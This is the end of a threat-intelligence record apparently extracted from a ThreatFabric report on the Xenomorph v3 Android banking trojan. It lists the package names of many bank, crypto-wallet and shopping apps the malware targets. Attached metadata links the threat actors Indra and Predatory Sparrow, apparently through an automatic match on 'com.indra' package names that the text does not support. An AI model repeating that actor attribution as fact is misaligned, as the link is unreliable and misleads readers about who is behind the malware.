FirstMobile\r\ncom.fss.indus IndusMobile\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 21 of 32\n\nPackageName AppName\r\ncom.fullsix.android.labanquepostale.accountaccess La Banque Postale\r\ncom.fusion.banking Bank Australia app\r\ncom.fusion.beyondbank Beyond Bank Australia\r\ncom.garanti.cepsubesi Garanti BBVA Mobile\r\ncom.gemini.android.app Gemini: Buy Bitcoin Instantly\r\ncom.getingroup.mobilebanking Getin Mobile\r\ncom.gmowallet.mobilewallet\r\nビットコイン・暗号資産（仮想通貨）ウ\r\nォレットアプリ GMOコイン｜チャート・\r\n購入・レバレッジ取引\r\ncom.greater.Greater Greater Bank\r\ncom.grupoavaloc1.bancamovil Banco de Occidente Móvil\r\ncom.grupocajamar.wefferent Grupo Cajamar\r\ncom.hittechsexpertlimited.hitbtc\r\nHitBTC – Bitcoin Trading and Crypto\r\nExchange\r\ncom.icomvision.bsc.tbc TBC Bank\r\ncom.ics.nl.icscards ICS Creditcard\r\ncom.ideomobile.discount Discount Bank\r\nבנק הפועלים - ניהול החשבון hapoalim.ideomobile.com\r\ncom.imaginbank.app imaginBank - Your mobile bank\r\ncom.indra.itecban.mobile.novobanco NBapp Spain\r\ncom.indra.itecban.triodosbank.mobile.banki -\r\ncom.indra.itecban.triodosbank.mobile.banking Triodos Bank. Banca Móvil\r\ncom.infonow.bofa Bank of America Mobile Banking\r\ncom.infosys.alh Al Hilal Mobile Banking App\r\ncom.infrasofttech.CentralBank Cent Mobile\r\ncom.infrasofttech.MahaBank Maha Mobile\r\ncom.ing.banking ING Banking\r\ncom.ing.mobile ING Bankieren\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 22 of 32\n\nPackageName AppName\r\ncom.ingbanktr.ingmobil ING Mobil\r\ncom.ininal.wallet ininal Wallet\r\ncom.interswitchng.www Fidelity Online Banking\r\ncom.intertech.mobilemoneytransfer.activity fastPay\r\ncom.isbank.isyerim Maximum İşyerim\r\ncom.isis_papyrus.hypo_pay_eyewdg HYPO Mein ELBA-App\r\ncom.itau Banco Itaú: Gerencie sua conta pelo celular\r\ncom.kasikorn.retail.mbanking.wap K PLUS\r\ncom.kbc.mobile.android.phone.kbc KBC Mobile\r\ncom.key.android KeyBank Mobile\r\ncom.konylabs.HongLeongConnect Hong Leong Connect Mobile Banking\r\ncom.konylabs.capitalone Capital One® Mobile\r\ncom.konylabs.cbplpat Citi Handlowy\r\ncom.kraken.trade Pro: Advanced Bitcoin \u0026 Crypto Trading\r\ncom.kubi.kucoin KuCoin: Bitcoin Exchange \u0026 Crypto Wallet\r\ncom.kutxabank.android Kutxabank\r\ncom.kuveytturk.mobil Kuveyt Türk\r\ncom.latuabancaperandroid Intesa Sanpaolo Mobile\r\ncom.leumi.leumiwallet לאומי\r\ncom.lumiwallet.android Lumi Crypto and Bitcoin Wallet\r\ncom.lynxspa.bancopopolare YouApp\r\ncom.magiclick.odeabank Odeabank\r\ncom.mbanking.ajmanbank Ajman Bank\r\ncom.mcom.firstcitizens First Citizens Mobile Banking\r\ncom.mediolanum.android.fullbanca Mediolanum\r\ncom.mediolanum Banco Mediolanum España\r\ncom.meridian.android Meridian Mobile Banking\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 23 of 32\n\nPackageName AppName\r\ncom.mfoundry.mb.android.mb_136 People’s United Bank Mobile\r\ncom.mobikwik_new\r\nBHIM UPI, Money Transfer, Recharge \u0026 Bill\r\nPayment\r\ncom.mobileloft.alpha.droid myAlpha Mobile\r\ncom.mobillium.papara Papara\r\ncom.mootwin.natixis My Savings\r\ncom.morganstanley.clientmobile.prod Morgan Stanley Wealth Mgmt\r\ncom.msf.kbank.mobile Kotak - 811 \u0026 Mobile Banking\r\ncom.mtb.mbanking.sc.retail.prod M\u0026T Mobile Banking\r\ncom.mycelium.wallet Mycelium Bitcoin Wallet\r\ncom.navyfederal.android Navy Federal Credit Union\r\ncom.ocbc.mobilemy OCBC Malaysia Mobile Banking\r\ncom.ocito.cdn.activity.banquelaydernier Banque Laydernier - Mobile\r\ncom.ocito.cdn.activity.creditdunord Crédit du Nord pour Mobile\r\ncom.okinc.okcoin.intl\r\nOkcoin - Buy \u0026 Trade Bitcoin, Ethereum, \u0026\r\nCrypto\r\ncom.okinc.okex.gp OKEx - Bitcoin/Crypto Trading Platform\r\ncom.oxigen.oxigenwallet Bill Payment \u0026 Recharge,Wallet\r\ncom.paribu.app Paribu\r\ncom.pcfinancial.mobile Simplii Financial\r\ncom.plunien.poloniex Poloniex Crypto Exchange\r\ncom.pnc.ecommerce.mobile PNC Mobile\r\ncom.pozitron.iscep İşCep - Mobile Banking\r\ncom.pozitron.qib QIB Mobile\r\ncom.pttfinans PTTBank\r\ncom.quoine.quoinex.light\r\nLiquid by Quoineライト版（リキッドバイ\r\nコイン） -ビットコインなどの仮想通貨取\r\n引所\r\ncom.rak RAKBANK Digital Banking\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 24 of 32\n\nPackageName AppName\r\ncom.rbc.mobile.android RBC Mobile\r\ncom.rsi.Colonya Colonya Caixa Pollença\r\ncom.rsi ruralvía\r\ncom.s4m EI Bank\r\ncom.samba.mb SambaMobile\r\ncom.samourai.wallet Samourai Wallet\r\ncom.sbi.SBAnywhereCorporate SBI Anywhere Corporate\r\ncom.sbi.SBIFreedomPlus Yono Lite SBI - Mobile Banking\r\ncom.scb.ae.bmw SC Mobile Banking (UAE)\r\ncom.schwab.mobile Schwab Mobile\r\ncom.sella.BancaSella Banca Sella\r\ncom.shaketh Shakepay: Buy Bitcoin Canada\r\ncom.sib.retail SIB Digital\r\ncom.snapwork.IDBI IDBI Bank GO Mobile+\r\ncom.snapwork.hdfc HDFC Bank MobileBanking\r\ncom.starfinanz.smob.android.sfinanzstatus Sparkasse Ihre mobile Filiale\r\ncom.suntrust.mobilebanking SunTrust Mobile App\r\ncom.tabtrader.android\r\nTabTrader Buy Bitcoin and Ethereum on\r\nexchanges\r\ncom.targo_prod.bad TARGOBANK Mobile Banking\r\ncom.targoes_prod.bad TARGOBANK - Banca a distancia\r\ncom.tarjetanaranja.emisor.serviciosClientes.appTitulares Naranja\r\ncom.td TD Canada\r\ncom.tdbank TD Bank (US)\r\ncom.teb CEPTETEB\r\ncom.teb.kurumsal CEPTETEB İŞTE\r\ncom.tecnocom.cajalaboral Banca Móvil Laboral Kutxa\r\ncom.tfkb Türkiye Finans Mobile Branch\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 25 of 32\n\nPackageName AppName\r\ncom.tmobtech.halkbank Halkbank Mobil\r\ncom.todo1.davivienda.mobileapp Davivienda Móvil\r\ncom.todo1.mobile Bancolombia App Personas\r\ncom.uab.personal United Arab Bank Mobile\r\ncom.unicredit Mobile Banking UniCredit\r\ncom.unocoin.unocoinwallet Unocoin Wallet\r\ncom.usaa.mobile.android.usaa USAA Mobile\r\ncom.usbank.mobilebanking U.S. Bank - Inspired by customers\r\ncom.uy.itau.appitauuypf Itaú Uruguay\r\ncom.vakifbank.mobile VakıfBank Mobil Bankacılık\r\ncom.vakifkatilim.mobil Mobile Branch\r\ncom.vancity.mobileapp Vancity\r\ncom.vanso.gtbankapp GTBank\r\ncom.vipera.chebanca CheBanca!\r\ncom.vipera.nbf NBF Direct App\r\ncom.vipera.ts.starter.MashreqAE Mashreq UAE\r\ncom.vtb.mobilebank VTB Mobile Georgia\r\ncom.wf.wellsfargomobile Wells Fargo Mobile\r\ncom.woodforest Woodforest Mobile Banking\r\ncom.wrx.wazirx\r\nWazirX - Buy Sell Bitcoin \u0026 Other\r\nCryptocurrencies\r\ncom.ykb.android Yapı Kredi Mobile\r\ncom.zellepay.zelle Zelle\r\ncom.ziraat.ziraatmobil Ziraat Mobile\r\ncom.ziraatkatilim.mobilebanking Katılım Mobil\r\ncom.zoluxiones.officebanking Banco Santander Perú S.A.\r\ncoop.bancocredicoop.bancamobile Credicoop Móvil\r\ncz.csob.smartbanking ČSOB Smartbanking\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 26 of 32\n\nPackageName AppName\r\nde.comdirect.android comdirect mobile App\r\nde.comdirect.app comdirect\r\nde.commerzbanking.mobil Commerzbank Banking - The app at your side\r\nde.consorsbank Consorsbank\r\nde.dkb.portalapp DKB-Banking\r\nde.fiducia.smartphone.android.banking.vr VR Banking Classic\r\nde.ingdiba.bankingapp ING Banking to go\r\nde.number26.android N26 — The Mobile Bank\r\nde.postbank.finanzassistent Postbank Finanzassistent\r\nde.santander.presentation Santander Banking\r\nde.sdvrz.ihb.mobile.app SpardaApp\r\nde.sdvrz.ihb.mobile.secureapp.sparda.produktion SpardaSecureApp\r\nde.traktorpool tractorpool\r\ndk.nordea.mobilebank Nordea Mobile - Denmark\r\ndoge.org.freewallet.app\r\nDogecoin Wallet. Store \u0026 Exchange DOGE\r\ncoin\r\nenbd.mobilebanking Emirates NBD\r\nes.bancosantander.apps Santander\r\nes.bancosantander.empresas Santander Empresas\r\nes.caixagalicia.activamovil ABANCA- Banca Móvil\r\nes.caixageral.caixageralapp Banco Caixa Geral España\r\nes.caixaontinyent.caixaontinyentapp Caixa Ontinyent\r\nes.ceca.cajalnet Cajalnet\r\nes.cecabank.ealia2103appstore UniPay Unicaja\r\nes.cm.android Bankia\r\nes.evobanco.bancamovil EVO Banco móvil\r\nes.ibercaja.ibercajaapp Ibercaja\r\nes.lacaixa.mobile.android.newwapicon CaixaBank\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 27 of 32\n\nPackageName AppName\r\nes.liberbank.cajasturapp Banca Digital Liberbank\r\nes.openbank.mobile Openbank – banca móvil\r\nes.orangebank.app Orange Bank - Banco Móvil\r\nes.pibank.customers Pibank\r\nes.santander.Criptocalculadora Criptocalculadora\r\nes.unicajabanco.app Unicaja Banco\r\nes.univia.unicajamovil UnicajaMovil\r\neu.afse.omnia.attica Attica Mobile\r\neu.atlantico.bancoatlanticoapp MY ATLANTICO\r\neu.eleader.mobilebanking.abk ABK Mobile Banking\r\neu.eleader.mobilebanking.invest plusbank24\r\neu.eleader.mobilebanking.nbk NBK Mobile Banking\r\neu.eleader.mobilebanking.pekao Pekao24Makler\r\neu.netinfo.colpatria.system Scotiabank Colpatria\r\neu.unicreditgroup.hvbapptan HVB Mobile Banking\r\nfinansbank.enpara Enpara.com Cep Şubesi\r\nfinansbank.enpara.sirketim Enpara.com Şirketim Cep Şubesi\r\nfr.banquepopulaire.cyberplus Banque Populaire\r\nfr.bred.fr BRED\r\nfr.creditagricole.androidapp Ma Banque\r\nfr.lcl.android.customerarea Mes Comptes - LCL\r\nge.bog.mobilebank BOG mBank - Mobile Banking\r\nge.lb.mobilebank Liberty\r\nge.mobility.basisbank BasisBank\r\ngr.co.hsbc.hsbcgr HSBC Greece\r\ngr.winbank.mobilenext Winbank Mobile\r\nhr.asseco.android.intesa.isbd.cib CIB Bank\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 28 of 32\n\nPackageName AppName\r\nhr.asseco.android.jimba.mUCI.hu UniCredit Mobile Application\r\nhu.bb.mobilapp Budapest Bank Mobil App\r\nhu.cardinal.cib.mobilapp CIB Business Online\r\nhu.cardinal.erste.mobilapp Erste Business MobilBank\r\nhu.khb K\u0026H mobilbank\r\nhu.mkb.mobilapp MKB Mobilalkalmazás\r\nhu.otpbank.mobile OTP Bank HU\r\nid.co.bitcoin Indodax\r\nבנק יהב - ניהול חשבון mobbanking.yahav.co.il\r\nil.co.yellow.app\r\nמבצעים והטבות עם הארנק הדיגיטלי – yellow\r\n!של פז\r\nio.metamask MetaMask - Buy, Send and Swap Crypto\r\nit.bcc.iccrea.mycartabcc myCartaBCC\r\nit.bnl.apps.banking BNL\r\nit.carige Carige Mobile\r\nit.copergmps.rt.pf.android.sp.bmps Banca MPS\r\nit.creval.bancaperta Bancaperta\r\nit.hype.app Hype\r\nit.icbpi.mobile Nexi Pay\r\nit.ingdirect.app ING Italia\r\nit.nogood.container UBI Banca\r\nit.popso.SCRIGNOapp SCRIGNOapp\r\njp.co.aeonbank.android.passbook\r\nイオン銀行通帳アプリ かんたんログイン\r\n＆残高・明細の確認\r\njp.co.netbk 住信SBIネット銀行\r\njp.co.rakuten_bank.rakutenbank 楽天銀行 -個人のお客様向けアプリ\r\njp.co.smbc.direct 三井住友銀行アプリ\r\njp.coincheck.android Bitcoin Wallet Coincheck\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 29 of 32\n\nPackageName AppName\r\nktbcs.netbank Krungthai NEXT\r\nlt.spectrofinance.spectrocoin.android.wallet Bitcoin Wallet by SpectroCoin\r\nma.gbp.pocketbank Pocket Bank\r\nmbanking.NBG NBG Mobile Banking\r\nmobi.societegenerale.mobile.lappli L’Appli Société Générale\r\nmx.bancosantander.supermovil Santander móvil\r\nmx.hsbc.hsbcmexico HSBC México\r\nmy.com.hsbc.hsbcmalaysia HSBC Malaysia\r\nmy.com.maybank2u.m2umobile Maybank2u MY\r\nnet.bitbay.bitcoin Bitcoin \u0026 Crypto Exchange - BitBay\r\nnet.bitstamp.app\r\nBitstamp – Buy \u0026 Sell Bitcoin at Crypto\r\nExchange\r\nnet.bnpparibas.mescomptes Mes Comptes BNP Paribas\r\nnet.garagecoders.e_llavescotiainfo ScotiaMóvil\r\nnet.inverline.bancosabadell.officelocator.android Banco Sabadell App. Your mobile bank\r\nnz.co.anz.android.mobilebanking ANZ goMoney New Zealand\r\nnz.co.asb.asbmobile ASB Mobile Banking\r\nnz.co.kiwibank.mobile Kiwibank Mobile Banking\r\nnz.co.westpac Westpac One (NZ) Mobile Banking\r\norg.banking.bom.businessconnect Bank of Melbourne Business App\r\norg.banking.bsa.businessconnect BankSA Business App\r\norg.banking.stg.businessconnect St.George Business App\r\norg.banksa.bank BankSA Mobile Banking\r\norg.bom.bank Bank of Melbourne Mobile Banking\r\norg.microemu.android.model.common.VTUserApplicationLINKMB Link Celular\r\norg.ncsecu.mobile SECU\r\norg.stgeorge.bank St.George Mobile Banking\r\norg.westpac.bank Westpac Mobile Banking\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 30 of 32\n\nPackageName AppName\r\norg.westpac.col Westpac Corporate Mobile\r\npaladyum.peppara PeP: Para Transferi Sanal Kart\r\npe.com.interbank.mobilebanking Interbank APP\r\npe.com.scotiabank.blpm.android.client Scotiabank Perú\r\npe.pichincha.bm APP Banco Pichincha Perú\r\npegasus.project.ebh.mobile.android.bundle.mobilebank George Magyarország\r\npiuk.blockchain.android\r\nBlockchain Wallet. Bitcoin, Bitcoin Cash,\r\nEthereum\r\npl.aliorbank.aib Alior Mobile\r\npl.allegro\r\nAllegro - convenient and secure online\r\nshopping\r\npl.bph BusinessPro Lite\r\npl.bps.bankowoscmobilna BPS Mobilnie\r\npl.bzwbk.bzwbk24 Santander mobile\r\npl.ceneo Ceneo - zakupy i promocje\r\npl.com.rossmann.centauros Rossmann PL\r\npl.envelobank.aplikacja Pocztowy\r\npl.fakturownia Fakturownia.pl\r\npl.ideabank.mobilebanking Idea Bank PL\r\npl.ifirma.ifirmafaktury IFIRMA - Darmowy Program do Faktur\r\npl.ing.mojeing Moje ING mobile\r\npl.mbank mBank PL\r\npl.nestbank.nestbank Nest Bank nowy\r\npl.noblebank.mobile Noble Mobile\r\npl.orange.mojeorange Mój Orange\r\npl.pkobp.iko IKO\r\npl.raiffeisen.nfc Mobilny Portfel\r\npl.sgb.wallet PORTFEL SGB\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 31 of 32\n\nPackageName AppName\r\nposteitaliane.posteapp.appbpol BancoPosta\r\nposteitaliane.posteapp.apppostepay Postepay\r\npt.bancobest.android.mobilebanking Best Bank\r\npt.bancobpi.mobile.fiabilizacao BPI APP\r\npt.bctt.appbctt Banco CTT\r\npt.cgd.caixadirectaempresas Caixadirecta Empresas\r\npt.novobanco.nbapp NB smart app\r\npt.santandertotta.mobileempresas Santander Empresas\r\npt.santandertotta.mobileparticulares Santander Particulares\r\npt.sibs.android.mbway MB WAY\r\nsoftax.pekao.powerpay PeoPay\r\ntr.com.abank.dijital Alternatif Bank Mobil\r\ntr.com.hsbc.hsbcturkey HSBC Turkey\r\ntr.com.hsbc.hsbcturkey.uk HSBC Turkiye\r\ntr.com.param.android Param\r\ntr.com.sekerbilisim.mbank ŞEKER MOBİL ŞUBE\r\ntr.gov.turkiye.edevlet.kapisi e-Devlet Kapısı\r\ntrendyol.com Trendyol - Hızlı ve Güvenli Alışverişin Yolu\r\ntsb.mobilebanking TSB Bank Mobile Banking\r\nuy.brou App Móvil del Banco República\r\nuy.com.brou.token BROU Llave Digital\r\nwit.android.bcpBankingApp.activoBank ActivoBank\r\nwit.android.bcpBankingApp.millennium Millenniumbcp\r\nwit.android.bcpBankingApp.millenniumPL Bank Millennium\r\nwww.ingdirect.nativeframe ING España. Banca Móvil\r\nSource: https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 32 of 32",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html"
	],
	"report_names": [
		"xenomorph-v3-new-variant-with-ats.html"
	],
	"threat_actors": [
		{
			"id": "8309f9cf-9abb-4ce3-aa1e-cda7d7f5c1b3",
			"created_at": "2022-10-25T16:07:23.729215Z",
			"updated_at": "2026-04-10T02:00:04.729076Z",
			"deleted_at": null,
			"main_name": "Indra",
			"aliases": [],
			"source_name": "ETDA:Indra",
			"tools": [
				"Stardust"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8d28f58b-5ea2-4450-a74a-4a1e39caba6e",
			"created_at": "2026-03-16T02:02:50.582318Z",
			"updated_at": "2026-04-10T02:00:03.777263Z",
			"deleted_at": null,
			"main_name": "COASTLIGHT",
			"aliases": [
				"Gonjeshke Darande",
				"Indra",
				"Predatory Sparrow"
			],
			"source_name": "Secureworks:COASTLIGHT",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "219ddb41-2ea8-4121-8b63-8c762f7e15df",
			"created_at": "2023-01-06T13:46:39.384442Z",
			"updated_at": "2026-04-10T02:00:03.309654Z",
			"deleted_at": null,
			"main_name": "Predatory Sparrow",
			"aliases": [
				"Indra",
				"Gonjeshke Darande"
			],
			"source_name": "MISPGALAXY:Predatory Sparrow",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434304,
	"ts_updated_at": 1775792119,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d8d09d9a4c8e5166c0f2c3ec5aa0cc194590b311.pdf",
		"text": "https://archive.orkl.eu/d8d09d9a4c8e5166c0f2c3ec5aa0cc194590b311.txt",
		"img": "https://archive.orkl.eu/d8d09d9a4c8e5166c0f2c3ec5aa0cc194590b311.jpg"
	}
}